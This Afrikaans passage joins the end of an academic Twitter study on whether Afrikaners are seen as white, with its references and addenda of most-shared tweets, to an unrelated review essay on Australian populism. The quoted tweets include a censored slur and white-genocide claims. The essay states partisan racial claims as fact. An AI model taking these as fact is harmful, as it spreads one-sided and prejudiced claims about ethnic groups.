Hier kan gesien word dat die grootste segment gebruikers Engelse name aangegee het, gevolg deur Zoeloe en dan Afrikaanse en Nederlandse gebruikersname. As gevolg van Afrikaners se diverse Europese oorsprong, kan dit verwag word dat Afrikaners se name as Afrikaans, Nederlands, Frans en Duits geïdentifiseer kan word, maar die Zoeloe, Sotho en Xhosa name is duidelik swart name. In die geval van Engelse name dui die groot persentasie op die gewildheid van Engelse name, maar dit is nie moontlik om te bepaal hoeveel van hierdie name na swart of wit gebruikers verwys nie. Nietemin dui Tabel 6 aan dat gebruikers wat ras aan die Afrikaner koppel, oorwegend nie Afrikaanse (of Nederlandse, Duitse of Franse) name het nie, wat daarop dui dat ras in die meerderheid gevalle van buite aan die Afrikaner opgelê word. Daar is egter ook ʼn groot groep met Afrikaanse, Nederlandse, Duitse en Franse name wat na ras verwys, wat daarop dui dat die etikettering van die Afrikaner as wit van sowel buite as binne opgelê word.

Indien ras van buite opgelê word, soos aangevoer deur byvoorbeeld Bartlett (2001) en Markus (2008) en toegepas deur die Unie van Suid-Afrika (1950), dan is dit duidelik dat om wit te wees, deel is van die Afrikaner se etnisiteit.

ʼn Klein aantal vals positiewe is ook gevind. Tabel 7 dui ʼn paar aan.

Tabel 7 Vals positiewe

Twiet

Kernwoord

 1. Slightly toasted white bread with lots of butter, dipped into sweet tea? Yeah its an old afrikaner thing, my grandparents used to do it a lot.

white

 1. Haha! Nah! Brahman has a tough competition man, there is Simmental Breed, Charolais Breed, Simbra Breed, Chabri Breed, Bonsmara Breed, Afrikaner Breed, etc. All along, I thought Brahman was..

Afrikaner

 1. Afrikaner Cattle. Because sometimes it’s easy to forget that there are breeds other than Angus, Charolais, and Simmental. (Picture from ). #cattle

Afrikaner

 1. Those criminal delinquents from Europe did not bring women to the cape. They found our beautiful xhoi and Nguni women here and raped them and that’s how the Afrikaner nation was born

Europe

Die eerste twiet is ʼn seldsame resep, maar dit is die enigste keer wat so iets voorkom. In die tweede en derde twiets word na Afrikanerbeeste verwys, maar dit is ook die enigste voorkoms van sulke verwysings. Die vierde twiet is egter interessant: dit postuleer ʼn heel ander verduideliking van die Afrikaner se genetiese herkoms. Die voorkoms van sulke uitsonderings is egter so min dat dit nie ʼn bedreiging vir die geldigheid van die resultate inhou nie.

5. Gevolgtrekking

Hierdie studie het duidelik aangetoon dat die Afrikaner se fisiese voorkoms ʼn belangrike komponent van sy etnisiteit uitmaak. Daar is uitgewys dat die oorweldigende meerderheid mense (99,7% van gebruikers wat ras noem) die Afrikaner as wit eerder as gemeng sien. Dit is ook beduidend dat meer as 41% van twiets ras noem: hier is geen poging aangewend om mense te vra of hulle die Afrikaner as wit sien nie, maar eerder is daar bloot gekyk na wat mense self oor Afrikaners sê. Bykans die helfte van gebruikers het uit hul eie ras ter sprake gebring, en dan met so ʼn oorweldigende meerderheid wat om wit te wees as ʼn komponent van Afrikanerwees sien. Alhoewel ras nie aanvanklik ʼn belangrike komponent van die Afrikaner se etnisiteit uitgemaak het nie, dui die huidige studie daarop dat dit tans die geval is.

Ras is egter net een komponent van die Afrikaner se etnisiteit, en toekomstige studies kan ander aspekte ontleed, asook ondersoek instel na hoe die Afrikaner in ander opsigte gesien word, byvoorbeeld oor watter temas hierdie twiets handel en of die Afrikaner in ʼn positiewe of negatiewe lig uitgebeeld word. Sulke studies kan gebruik maak van sentimentontleding of masjienleer om temas te identifiseer.

6. Verwysings

Ailawadhi, S. et al., 2018. Disease and outcome disparities in multiple myeloma: exploring the role of race/ethnicity in the Cooperative Group clinical trials. Nature, Volume 8, p. 67.
UNPO, 2017. Afrikaners. [Aanlyn]: https://unpo.org/members/8148 [Toegang tot 13 Mei 2019].
Ball, R. et al., 2010. A comparison between Chinese and Caucasian head shapes. Applied Ergonomics, 41(6), p. 832–839.
Ball, R. M. & Molenbroek, J. F. M., 2008. Measuring Chinese heads and faces. Human Diversity: design for life: 9th International Congress of Physiological Anthropology: Proceedings, p. 150–155.
Barge, J. & Endsor, M., 2014. A Structural Analysis of Social Media Networks. London: The International Centre for Security Analysis, The Policy Institute at King’s College.
Bartlett, R., 2001. Medieval and Modern Concepts of Race and Ethnicity. Journal of Medieval and Early Modern Studies, 31(1), pp. 39-56.
Buys, F., 2013. Wie en wat is ‘n Afrikaner?. [Aanlyn]: https://maroelamedia.co.za/debat/meningsvormers/wie-en-wat-is-n-afrikaner/ [Toegang tot 13 Mei 2019].
Chambers, D., 2019. This is what really happened on Clifton Fourth Beach: security firm boss. [Aanlyn]: https://www.timeslive.co.za/news/south-africa/2019-01-05-this-is-what-really-happened-on-clifton-fourth-beach-security-firm-boss/ [Toegang tot 8 Januarie 2019].
Chamlertwat, W., Bhattarakosol, P. & Rungkasiri, T., 2012. Discovering Consumer Insight from Twitter via Sentiment Analysis. Journal of Universal Computer Science, 18(8), pp. 973-992.
Chung, F., 2018. ‘The time for reconciliation is over’: South Africa votes to confiscate white-owned land without compensation. [Aanlyn]: https://www.news.com.au/finance/economy/world-economy/the-time-for-reconciliation-is-over-south-africa-votes-to-confiscate-whiteowned-without-compensation/news-story/a8a81155995b1adc1c399d3576c4c0bc [Toegang tot 8 Januarie 2019].
Cloete, E., 1992. Afrikaner identity: culture, tradition and gender. Agenda Feminist Media, Volume 13, pp. 42-56.
Colenbrander, H. T., 1964. De afkomst der Boeren. Kaapstad: Struik.
Collins, F. S., 2004. What we do and don’t know about ‘race’, ‘ethnicity’, genetics and health at the dawn of the genome era. Nature, 36(11), pp. 13-15.
De Klerk, F., 2013. Why South Africa owes a huge debt to the Iron Lady. [Aanlyn]: https://www.standard.co.uk/comment/comment/fw-de-klerk-why-south-africa-owes-a-huge-debt-to-the-iron-lady-8574822.html [Toegang tot 13 Mei 2019].
De Vries, A., 2005. Dié swart Afrikaners woon al jare op hul ‘bloedgrond’. Rapport, 26 Februarie, [Aanlyn]: http://www.rapport.co.za/Suid-Afrika/Nuus/Die-swart-Afrikaners-woon-al-jare-op-hul-bloedgrond-20050226-2 [Toegang tot 13 Mei 2019].
Du Toit, P., 2018. Men On A Mission: AfriForum’s Kriel And Roets En Route To US To Talk About Land, Crime. [Aanlyn]: https://www.huffingtonpost.co.za/2018/05/02/men-on-a-mission-afriforums-kriel-and-roets-en-route-to-us-to-talk-about-land-crime_a_23425166/ [Toegang tot 8 Januarie 2019].
Eloff, T., 2017. Who owns the land?. [Aanlyn]: http://www.politicsweb.co.za/opinion/who-owns-the-land [Toegang tot 10 April 2018].
Erasmus, J. C., Klingenberg, A. & Greeff, J. M., 2015. Allele frequencies of AVPR1A and MAOA in the Afrikaner population. South African Journal of Science , Volume 7, pp. 1-6.
Fihlani, P., 2018. Vicky Momberg: South African estate agent jailed for racist abuse. [Aanlyn]: https://www.bbc.com/news/world-africa-43567468 [Toegang tot 8 Januarie 2019].
Fu, S., He, H. & Hou, Z.-G., 2014. Learning Race from Face: A Survey. IEEE Transactions on Pattern Analysis and Machine Intelligence, 36(12), pp. 2483-2509.
Giliomee, H., 2004. Die Afrikaners. ’n Biografie. Kaapstad: Tafelberg.
Ginther, D. K. et al., 2011. Race, Ethnicity, and NIH Research Awards. Science, 333(6045), pp. 1015-1019.
Gous, N., 2018. AfriForum in Australia to talk about farm attacks and murders in SA. [Aanlyn]: https://www.timeslive.co.za/news/south-africa/2018-10-14-afriforum-in-australia-to-talk-about-farm-attacks-and-murders-in-sa/ [Toegang tot 8 Januarie 2019].
Greeff, J. M., 2007. Deconstructing Jaco: Genetic Heritage of an Afrikaner. Annals of Human Genetics, Volume 71, p. 674–688.
Grobler, R., 2018. No compensation for guessing what SA’s ‘word’ of the year is. [Aanlyn]: https://www.news24.com/SouthAfrica/News/no-compensation-for-guessing-what-sas-word-of-the-year-is-20181016 [Toegang tot 8 Januarie 2019].
Guerrero, S. et al., 2018. Analysis of Racial/Ethnic Representation in Select Basic and Applied Cancer Research Studies. Nature, Volume 8, p. 13978.
Heese, H., 1979. Identiteitsprobleme gedurende die 17de eeu. Kronos, Volume 1, pp. 27-33.
Heese, H., 1984. Groep sonder grense. Die rol en status van die gemengde bevolking aan die Kaap, 1652-1795. Bellville: Universiteit van Wes-Kaapland.
Heese, J., 1971. Die herkoms van die Afrikaner, 1657-1867. Kaapstad: A.A. Balkema.
Hill, H., Bruce, V. & Akamatsu, S., 1995. Perceiving the sex and race of faces: The role of shape and color. Proceedings of the Royal Society B: Biological Sciences, 261(1362), p. 367–373.
Jiang, H., Lin, P. & Qiang, M., 2016. Public-opinion sentiment analysis for large hydro projects. Journal of Construction Engineering and Management, 142(2), p. 1–12.
Jorgenson, E. et al., 2017. Genetic contributors to variation in alcohol consumption vary by race/ethnicity in a large multi-ethnic genome-wide association study. Molecular Psychiatry, Volume 22, p. 1359–1367.
Killalea, D., 2018. South Africa: Peter Dutton’s ‘white farmer’ comments anger Pretoria. [Aanlyn]: https://www.news.com.au/finance/economy/world-economy/south-africa-peter-duttons-white-farmer-comments-anger-pretoria/news-story/a6a48505f72dabf517e961efa58242be [Toegang tot 8 Januarie 2019].
Kotzé, E. & Senekal, B. A., 2018. Employing sentiment analysis for gauging perceptions of minorities in multicultural societies: An analysis of Twitter feeds on the Afrikaans community of Orania in South Africa. The Journal for Transdisciplinary Research in Southern Africa, 14(1), p. a564.
Kriel, K., 2018. No Mr Ramaphosa, we’re in the US fighting for SA – AfriForum. [Aanlyn]: https://www.politicsweb.co.za/news-and-analysis/no-mr-ramaphosa-were-in-the-us-fighting-for-sa–af [Toegang tot 8 Januarie 2019].
Lee, J. et al., 2017. Name Nationality Classification with Recurrent Neural Networks. s.l., s.n., pp. 2081-2087.
Malan, C., 2005. Resensie van Die Afrikaners. ’n Biografie. Tydskrif vir Letterkunde, 42(2), pp. 211-212.
Malmasi, S. & Dras, M., 2014. A Data-driven Approach to Studying Given Names and their Gender and Ethnicity Associations. s.l., s.n., p. 145−149.
Markus, H. R., 2008. Pride, Prejudice, and Ambivalence: Toward a Unified Theory of Race and Ethnicity. American Psychologist, pp. 651-670.
Masinga, L., 2018. Concourt ruling on Hoërskool Overvaal a blow to non-racialism – Lesufi. [Aanlyn]: https://www.iol.co.za/news/politics/concourt-ruling-on-hoerskool-overvaal-a-blow-to-non-racialism-lesufi-16281981 [Toegang tot 8 Januarie 2019].
Milne, D. et al., 2015. We Feel: Taking the emotional pulse of the world. Melbourne, s.n.
Mislove, A. et al., 2011. Understanding the Demographics of Twitter Users. s.l., s.n., pp. 554-557.
Mitchley, A., 2018. Hoërskool Overvaal denies allegations of racial segregation. [Aanlyn]: https://www.news24.com/SouthAfrica/News/hoerskool-overvaal-denies-allegations-of-racial-segregation-20180109 [Toegang tot 8 Januarie 2019].
Mkokeli, S., 2018. South Africa’s Path to Land Reform Is Riddled With Pitfalls. [Aanlyn]: https://www.bloomberg.com/news/articles/2018-11-23/south-africa-s-path-to-land-reform-is-riddled-with-pitfalls [Toegang tot 8 Januarie 2019].
Morisaki, N., Kawachi, I., Oken, E. & Fujiwara, T., 2017. Social and anthropometric factors explaining racial/ethnical differences in birth weight in the United States. Nature, Volume 7, p. 46657.
Nombembe, P., 2018. Sheep slaughtered on Clifton beach as animal rights activists protest. [Aanlyn]: https://www.timeslive.co.za/news/south-africa/2018-12-28-sheep-slaughtered-on-clifton-beach-as-animal-rights-activists-protest/ [Toegang tot 8 Januarie 2019].
Omand, D., Bartlett, J. & Miller, C., 2012. Introducing Social Media Intelligence (SOCMINT). Intelligence and National Security, 27(6), pp. 801-823.
Osborne, S., 2018. South Africa votes through motion that could lead to seizure of land from white farmers without compensation. [Aanlyn]: https://www.independent.co.uk/news/world/africa/south-africa-white-farms-land-seizure-anc-race-relations-a8234461.html [Toegang tot 8 Januarie 2019].
Osborne, S., 2018. South Africa votes through motion to seize land from white farmers without compensation. [Aanlyn]: https://www.independent.co.uk/news/world/africa/south-africa-white-farms-land-seizure-anc-race-relations-a8234461.html [Toegang tot 10 April 2018].
Pijoos, I., 2018. Vicki Momberg sentenced to an effective 2 years in prison for racist rant. [Aanlyn]: https://www.news24.com/SouthAfrica/News/vicki-momberg-sentenced-to-an-effective-2-years-in-prison-for-racist-rant-20180328 [Toegang tot 8 Januarie 2019].
Rademeyer, A., 2018. AfriForum-hoës in VSA vir bewusmaking oor plaasmoorde en onteiening. [Aanlyn]: https://maroelamedia.co.za/nuus/sa-nuus/afriforum-hoes-in-vsa-vir-bewusmaking-oor-plaasmoorde-en-onteiening/ [Toegang tot 8 Januarie 2019].
Rhode, S., 2012. The people of Onverwacht. Pretoria, s.n.
Ritchie, K., 2018. Vicki Momberg shouldn’t be alone for long. [Aanlyn]: https://www.iol.co.za/sundayindependent/dispatch/vicki-momberg-shouldnt-be-alone-for-long-14183453 [Toegang tot 8 Januarie 2019].
Roelf, W., 2018. South African parliament endorses report on disputed land reform. [Aanlyn]: https://www.reuters.com/article/us-safrica-land/south-african-parliament-endorses-report-on-disputed-land-reform-idUSKBN1O31WL [Toegang tot 8 Januarie 2019].
Rosenberg, N. A. et al., 2002. Genetic Structure of Human Populations. Science, 298(5602), pp. 2381-2385.
Sekhotho, K., 2018. SA’s word of the year 2018 is…. [Aanlyn]: https://ewn.co.za/2018/10/16/sa-s-word-of-the-year-2018-is [Toegang tot 8 Januarie 2019].
Solidariteit Navorsingsinstituut, 2018. Geanker in Afrika. Migrasiepatrone onder die Afrikanerbevolking, Centurion: Solidariteit Navorsingsinstituut.
Steinhauser, G., 2018. Trump Tweet on South African Land Overhaul Draws Government’s Ire. [Aanlyn]: https://www.wsj.com/articles/trump-tweet-on-south-african-land-reform-draws-governments-ire-1535017460 [Toegang tot 8 Januarie 2019].
Theunissen, P., 2015. Being ‘Afrikaans’: A contested identity. Paper presented at the International Communication Association Annual Conference, San Juan, Puerto Rico.
Treurnicht, A., 1975. Credo van ‘n Afrikaner. Kaapstad: Tafelberg.
Trivedi, A. & Amali, D. G. B., 2017. A comparative study of machine learning models for ethnicity classification. Proceedings of the IOP Conference Series: Materials Science and Engineering, p. 042091.
Tumasjan, A., Sprenger, T. O., Sandner, P. G. & Welpe, I. M., 2010. Predicting Elections with Twitter: What 140 Characters Reveal about Political Sentiment. s.l., Association for the Advancement of Artificial Intelligence, pp. 178-185.
Tumasjan, A., Sprenger, T., Sandner, P. & Welpe, I., 2010. Predicting elections with Twitter: What 140 characters reveal about political sentiment. s.l., s.n., p. 178–185.
Unie van Suid-Afrika, 1950. Population Registration Act, 1950. Kaapstad: Unie van Suid-Afrika.
Verwey, C. & Quayle, M., 2012. Whiteness, racism, and Afrikaner identity in postapartheid South Africa. African Affairs, 111(445), p. 551–575.
Vo, T., Nguyen, T. & Le, C. T., 2018. Race Recognition Using Deep Convolutional Neural Networks. Symmetry, 10(564), pp. 1-15.
Voicu, I., 2018. Using First Name Information to Improve Race and Ethnicity Classification. Statistics and Public Policy, 5(1), pp. 1-13.
Wang, H. et al., 2012. A System for Real-time Twitter Sentiment Analysis of 2012 U.S. Presidential Election Cycle. s.l., s.n., p. 115–120.
World Wide Worx, 2016. South African Social Media Landscape 2017 – Executive summary. [Aanlyn]: http://www.worldwideworx.com/wp-content/uploads/2016/09/Social-Media-2017-Executive-Summary.pdf [Toegang tot November 2017].
Xie, Y., Luu, K. & Savvides, M., 2012. A robust approach to facial ethnicity classification on large scale face databases. Proceedings of the IEEE International Conference on Biometrics: Theory, Applications, and Systems, p. 143– 149.
Zhuang, Z. & Bradtmiller, B., 2005. Head-and-face anthropometric survey of U.S. respirator users. Journal of Occupational and Environmental Hygiene, 2(11), p. 567–576.
Zhuang, Z. et al., 2010. Shape analysis of 3D head scan data for U.S. respirator users. EURASIP Journal on Advances in Signal Processing, Volume 3, p. 1–10.
Zuberi, T., Sibanda, A. & Udjo, E. O., 2015. The Demography of South Africa. New York: Routledge.

7. Addendum 1: Ras duidelik gespesifiseer

Hierdie is die 15 twiets wat die meeste gedeel is waarin ras gespesifiseer is.

Nommer

Teks

#rekords
1

Happy 72nd Birthday to the late Steve Biko. An anti-apartheid activist, he founded the Black Consciousness Movement. On 12 September 1977, Stephen Bantu Biko died in a prison cell in Pretoria. 20 years later, an Afrikaner police, Gideon Nieuwoudt, admitted to killing him.

857
2

Dear Citizen. Here is your genocide definition. Don’t think it’s not happening because you’re not a white Afrikaner. Call us brats, cry-babies or cockroaches, if you want. You will be judged for laughing at the pain of an exterminated minority

186
3

SA celebs are part of this ongoing racist problem. Just a few days ago, black Twitter sympathized with Lerato Kganyago for being attacked by an Afrikaner man. We even pressured PickNPay to release the tape of her ordeal. Today #CliftonBeach is trending, she’s nowhere to be found.

178
4

#GivenMakhari was fawning & weak & allowed #JohannRupert to get away with appalling racist arrogance. Johann is an arrogant, racist white Afrikaner. He treated Given with disdain. Not sure Given deserve better. But black South Africa does not deserve Johann Rupert’s arrogance!

154
5

Like I previously said. It’s useless to celebrate Siya Kolisi as the first Springbok Captain for as long as he still continues to sing “Die Stem” and infatuated with the whole Afrikaner culture in SA Rugby. Not all blacks are black excellence, esp blacks who are wannabe whites

134
6

Plz help support the most vulnerable in South Africa.These white children &elderly suffer greatly due 2racist govt policies.Elderly should never hav2 survive on cat food&all children should have blankets.Please take time to read.

100
7

Before formalisation Afrikaans was considered a “Hotnotstaaltjie”. 200 years after the birth of Oude Ram Afrikaner, white settlers started to call themselves Afrikaners and took Afrikaans, the language of the mixed-race descendants of indigenous Khoikhoi and slaves, as their own.

82
8

Afrikaner Children Squatter Camps  Afrikaner young suffering for a past they had no say in. With their parents falling victim to B.E.E laws, what future have these people?

76
9

For my claims of genocide to qualify I can only include white, Afrikaner farmers. Not all whites. Although subject to staggering mortality rates, very few groups in the world are killed at rates higher than 100/100 000. No singing matter and no parody can soften the blow.

67
10

Did you know that Namib Mills, a company owned by a white South African man who doesn’t even live in Namibia, has an all white management team? Everyone, bar one German lady, is a white Afrikaner. Checkout their website:

56
11

I might be Irish, I know I am a a$$hole… but I have never met a “culture and nation” that has more respect, love, perseverance, patience, respect and love as a true Afrikaner (Boer) – I have your back Boertjie and much love #TwitterBoere

53
12

#Pretoria | Boereoorlog forte moet as erfenis bewaar word!🇿🇦 “Die @VFplusGP-Jeug doen ‘n beroep op die @CityTshwane asook die departement van @ArtsCultureSA om die vier forte in Pretoria te restoureer!” – @JeanKriek 📌Artikel:  #OnsErfenis #AngloBoerWar🐴

51
13

ENGLAND WAS NEVER CHARGE WITH WAR CRIMES AGAINST AFRIKANERS WHICH WAS COMMITTED IN THE BOER WAR? IT’S NEVER TO LATE TO GET JUSTICE? ENGLAND HAVE NEVER APOLOGIES FOR THEIR ABUSE OF THE AFRIKANER WOMEN AND CHILDREN? RAPE, HUMAN RIGHTS VIOLATION, MURDER OF CHILDREN BY STAVING THEM?

48
14

America 🇺🇸 is slowly awakening what the ANC EFF BFLF Terrorists are doing to the Afrikaner Boer People in South Africa 🇿🇦. The ANC EFF BFLF are nothing but MONSTERS!!

48
15

In 1707 a man named Hendrik Bidault, on being arrested at the Cape by the VOC, shouted “Ik ben een Africaander!” (I am an Afrikaner!) Bidault’s defiant cry of secession from Dutch law & VOC sovereignty was a leap towards establishing a new identity – an Afrikaner identity.

44

8. Addendum 2: Ras nie gespesifiseer nie

Hierdie is die 15 twiets wat die meeste gedeel is waarin ras nie gespesifiseer is nie.

Nommer Teks #rekords
1

Accord on Afrikaner self-determination recognises the Afrikaner people’s right to self-determination Signed on 23 April 1994 by: 1. FF – Constand Viljoen 2. ANC – Thabo Mbeki 3. Apartheid Govt (NP) – Roelf Meyer Protected by the Constitution in Section 235 Orania was first.

337
2

I always have a little laugh when I think about how the actual Jan van Riebeeck (left) wasn’t aesthetically pleasing enough for Afrikaner nationalist propaganda, so they kept the erroneous image of Bartholomeus Vermuyden (right), a man with no connection to South Africa😂

190
3

Afrikaner nationalism forced all government employees to join Sanlam. In China; they closed down Amazon until Alibaba became number 1 in the world. In South Africa we talk BBBEE but can’t have most employees on Sizwe Medical Aid.

139
4

Rather than blaming Britain for the Afrikaner people’s poverty in the 1930/40’s, #JohanRupert’s father started a business in his garage and worked 30 years before achieving success! To negate that is cognitive dissonance.

99
5

I have a South African ID that states I am South Africa. I come from the Afrikaner culture and I speak Afrikaans, note the “Afrika” in both of those words. You can come with your idiotic ideas and statements that I am not African, I will simply slap you with my RSA ID. Tsek.

87
6

Tomorrow is our Covenant day! Be sure to share it with all your Afrikaner Patriot friends to celebrate it!

78
7

Despite superior military power, Afrikaners simply surrendered without defeat. “You, me and our men can take this country in an afternoon,” said former Chief of the SADF general Constand Viljoen, famously to General George Meiring. But, the Afrikaner just gave up his birthright.

75
8

Afrikaner calls Clifton beach protesters ‘k***ir barbarians’, Malema a ‘real k***ir’

73
9

A grand total of 22 house break-ins and robberies in rural areas, maliciously labelled “farm attacks” by Afrikaner supremacist lobby Afriforum have been reported in the Western Cape in 2018 Meanwhile Manenberg had 505 gunshots in 9 days without a single lobby group raising alarm

69
10 Give the Afrikaner Nation an empty piece of desolate land and come back in 100 years. What do you think you would find? 68
11

Mkhari – let’s create opportunities for networking for business. Rupert: You want an Afrikaner money ? #RupertOnPower 🤯😳🥶

68
12 Has anyone seen this before? Afrikaner Self Determination Accords- Signed by the UK & US ambassadors. And agreed to by the ANC. 63
13

If we are to get Help from the USA, Do you want refugee status or a forced negotiated settlement for a homeland along the lines of the Afrikaner Self Determination accords 1994 (see thread for info)

55
14

I am in need of all Afrikaner people. Something major is being prepared to prove without a doubt exactly what’s going on, in a legal way…in chronological order. We need to cooperation of ur community 2 help w/statements of being victims and any evidence of proof. Documents…

55
15

Yes, your anti-Afrikaner racism makes it hard for you to show respect when an Afrikaner is speaking…

46

Royce Kurmelovs oor Australiese politiek

Resensie-essay deur Leon Lemmer

Vroeër vanjaar was Australië plaaslik polities in die nuus toe een van sy ministers die mening uitgespreek het dat daar voorkeur aan Suid-Afrikaanse boere as immigrante gegee behoort te word. Hierdie uitlating is in Afrikanergeledere verwelkom en voorspelbaar deur die ANC-regering verdoem. Uiteindelik was daar ‘n aanduiding dat in die buiteland amptelik kennis van die benarde situasie van Suid-Afrikaanse blankes geneem word. Wat ek my afgevra het, is: Waarom nou eers en waarom ‘n respons van net ‘n enkele land?* Waar is die reaksie van die baie ander lande wat luidrugtig en vol gewetenswroeging teen rassediskriminasie en apartheid te velde getrek het? Waarom nie die huidige (wraaksugtige) rassediskriminasie deur die ANC-regering veroordeel nie?

[* Hongarye bied dalk ook ‘n heenkome aan blanke Suid-Afrikaanse vlugtelinge. Die Visegrad-lande (Hongarye, Pole, Tsjeggië, Slowakye) verset hulle teen die massa-immigrasie uit die Midde-Ooste, Ooste en Afrika wat Europa oorspoel. Die Europese Unie (EU), onder die leiding van Duitsland en Frankryk, verwag dat alle EU-lande volgens kwotas hierdie “vlugtelinge” moet inneem. Die Hongaarse eerste minister, Viktor Orban, het in 2016 gesê: “Hungary would open its door to ‘true refugees’ – those from Western Europe fleeing the breakdown of their societies” (Julian Langness, Identity rising, St Paul: ES Linden, 2017, 337p; Amazon Kindle $1.14, 3003). As Europeërs kwalifiseer blanke Suid-Afrikaners moontlik ook. Maar om Hongaarse burgerskap te bekom, sal dit maar bars gaan om Hongaars, ‘n nie-Euro/Indo-Germaanse taal, baas te raak.]

Soos in Amerika en Brittanje is daar tradisioneel twee groot politieke partye in Australië. In die regering wissel die Arbeidersparty en die Liberale Party (in koalisie met die Nasionale Party) mekaar af. Die Arbeidersparty is links en die Liberale Party en Nasionale Party regs van die sentrum. Soos in Amerika en Brittanje het die tradisioneel duidelike onderskeid tussen die twee hoofpartye gedurende die afgelope dekades vervaag. “The Libs never gave a damn about ordinary people, while Labor have given up their blue-collar roots” (Royce Kurmelovs, Rogue nation: Dispatches from Australia’s populist uprisings and outsider politics, Sydney: Hachette, 2017, 272p; Amazon Kindle $14.02, 1789). “Labor has largely abandoned the bottom 30 per cent to pursue the aspirational middle ever since 1996” (3117). Daar is ook talle kleiner politieke partye* en “onafhanklikes” wat koalisievennote in die sentrale (of federale) regering of in die ses staatsregerings kan wees. Kurmelovs verwys na “the deeper sickness within the major parties” (3048).

[* Daar is bv die United Patriots Front (UPF): “Among the loose constellation of extreme groups which make up Reclaim Australia, the UPF were the most militant. They were fascist in the plainest sense of the word” (2305). Kurmelovs gebruik die term “fascis” glad te graag as hy iemand wil slegsê – kyk hier onder.]

Die kernprobleem wat die kiesers al hoe meer met die politiek het, is die politici. Die politici is dikwels kansvatters wat nie die mas in die openbare sektor kan opkom nie en hulle dan tot die politiek wend, wat buitensporige vergoeding en byvoordele bied, terwyl geen bewys van formele kwalifikasies of prestasie vereis word nie. Nigel Farage het as leier van die United Kingdom Independence Party (UKIP) bekendheid verwerf. Hy sê: “People are not disenchanted with politics. They are disconnected from the politically-correct carer class of politicians. Just look at them. It is like a game. They are all fighting desperately to hold the middle ground. They are made up of focus-groupies, triangulators, dog-whistlers, politicians who daren’t say what they really mean. And we [UKIP] are different from that. We stand up and tell it like it is and whether people agree with it or nor at least they know where we stand … and I’m proud of that” ( Matthew Lynn, Independently minded: The rise of Nigel Farage, Endeavor Press, 2014, 67p; Amazon Kindle $4.59, 73).

UKIP “is an uprising against a professional, managerial class of politicians, and against the alliance of big business and big government that is not only estranged from ordinary people, but increasingly doesn’t seem to care much about them either” (91). “Democracies had been hi-jacked by professional politicians, creating a network of parties, think-tanks, bureaucracies, lobbyists and political correspondents that talked mainly to each other and for whom politics was really just a career rather than a calling” (651). Die Europese Unie, volgens Farage, “has been captured by a bureaucracy, which has put its own survival above any other objective” (508). “UKIP became the protest party, the anti-system party” (690).

“Farage is well aware that campaigning as an anti-politician is a big part of his appeal” (708). YouTube word beskryf as “the single most important factor in the rise of [UKIP]” (381). Farage het 100 000 volgelinge op Twitter (385). Die naam Reclaim Australia is eintlik dieselfde as UKIP se slagspreuk: “We want our country back” (86). “Withdrawing from Europe [is] a way of re-claiming [British] sovereignty and the power to make decisions locally” (809). Al hoe meer Australiërs eis hulle land terug omdat hulle voel dat die blanke inwoners deur nie-wit immigrante uit Asië en Afrika verswelg word.

Die inkrimping van die tradisioneel groot politieke partye in Australië en die opkoms van kleiner partye en die verkiesing van onafhanklikes bring mee dat koalisies gevorm moet word voordat daar ‘n regering kan wees. In hierdie situasie “the country independents became kingmakers” (Kurmelovs 1576). In koalisie maak hulle dit vir die groter partye moontlik om ‘n regering te vorm, wat beteken “power is a cooperative relationship” (1616). “With the trend towards government by coalition and a persistently fractured Senate, populists are powerful. Each represents a regional blend on the same general theme, operates on the same basic principles, and will often work with each other at the expense of the major parties. They are, in a manner of speaking, a decentralised, emergent political party” (3031). As gevolg van die moontlikheid van koalisievorming “voting for a minor party or independent candidate is a lottery, as there’s no way of knowing where your vote will end up. This may be true, but then politics itself has never been a perfectly rational process” (3053).

In opvolging van my artikel oor Chinese indringing in Australië en elders (Praag 16.06.2018) het ek Kurmelovs se boek gelees. Daarin word na “the Asian Invasion” van Australië verwys (1341). Dit gaan nie net om immigrante nie, maar ook om vlugtelinge, wat nie net om politieke redes gevlug het nie, maar dikwels eerder om ekonomiese redes. Die boek word geadverteer as “essential reading about Australian politics.” Die outeur is ‘n joernalis wat eerstehandse kennis van die Australiese politiek het. Sy invalshoek is die tans reeds geykte verbandlegging tussen drie verskynsels: die verkiesing van Donald Trump as Amerika se president in 2016,* die 2016-referendum-uitslag wat die uittrede van Brittanje uit die Europese Unie tot gevolg gaan hê (Brexit), asook politieke populisme,** wat die vorm van anti-elitisme kan aanneem. Hierdie drie verskynsels word as ‘n verskuiwing na regs vertolk. Die volgende is ‘n onmiskenbare hoewel versluierde anti-Trump-verwysing: “What had happened to us, and the rest of the world, when fear-mongers and conspiracy nuts were suddenly put in charge of nuclear codes and the national budget?” (91).

[* Trump se verkiesing is in Australië onder meer verwelkom as “the ‘beginning of the Western spring’, a reference to the Arab Spring that toppled autocratic regimes across the Middle East” (1465).

** “Populism … is radical democracy and a by-product of neglect or indifference by the status quo. It works by taking different interests and binding them together against a common enemy, a coalition of the underdogs united, despite the traditional antagonisms or apparent contradictions between them, along a clear overarching theme” (3015). “Populism in itself isn’t a bad thing, but it’s what you combine it with that makes it potent. Mixed with the left, it focuses on those with money and power. Blended with the right, it takes aim at immigrants, refugees and enemies of the nation. Keep it in the centre and everyone ends up unsatisfied. Put it in a coalition and its worst impulses are tempered, allowing it to do some good by pushing for reform in those area that sorely need it. Give it majority rule, things can turn ugly” (3020) – bv die ANC se mobilisering van anti-blanke sentiment.]

Kurmelovs se teks het by my van meet af dieselfde indruk as Gabriël Botma se boek, Polemieke (Praag 7.04.2018), gewek – dat Kurmelovs eerder links as regs neig en hy sy politieke oortuigings, soos Botma, grootliks terughou tot kort voor die einde van sy boek. Die leser word op ‘n rit op ‘n jollielorrie (“band wagon”) van aktualiteit geneem, wat veraangenaam word deur goed geformuleerde, vloeiende teks. Die outeur het baie van die inligting tydens veldwerk op die Australiese platteland versamel – nie in die stede waar die politici by voorkeur vertoef nie – wat uiteraard die waarde van die boek verhoog. Kurmelovs verwys na ‘n spesifieke politikus wat hy beskryf as “a walking stereotype, an embodiment of the way city folk see country people” (1506), wat by daardie politikus sekerlik ‘n skeut vooroordele en wanvoorstellings insluit. Die oorgrote meerderheid Australiërs is stadsbewoners.

